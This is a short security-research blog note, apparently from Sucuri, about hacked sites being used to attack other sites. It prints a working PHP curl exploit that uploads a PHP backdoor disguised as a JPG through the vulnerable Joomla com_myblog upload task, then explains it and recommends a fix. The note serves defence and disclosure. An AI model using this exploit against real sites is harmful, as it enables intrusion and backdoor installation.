Hacked Sites Help Hack Third-Party Sites

  • September 8, 2015
Labs Note

Just a reminder that your hacked site may be used to anonymously hack third-party sites.

This Joomla com_Myblog exploit script was found on one hacked site:

$uploadfile="tq.php.jpg";
$ch = curl_init("http://<third-party-site.com>/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

This code uploads a PHP backdoor disguised as a JPG file using a vulnerability in a really old (and it looks like, not longer supported) My Blog Joomla component.

Still some webmaster use it on Joomla 1.5.x sites and this exploit has proven to be efficient as you can read in this blogpost. This blogpost also provides a quick fix for this vulnerable component. Apply it if you still use legacy versions of this component, but also consider upgrading your site to use software that is up to date (Both Joomla and third-party components, plugins and templates)

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like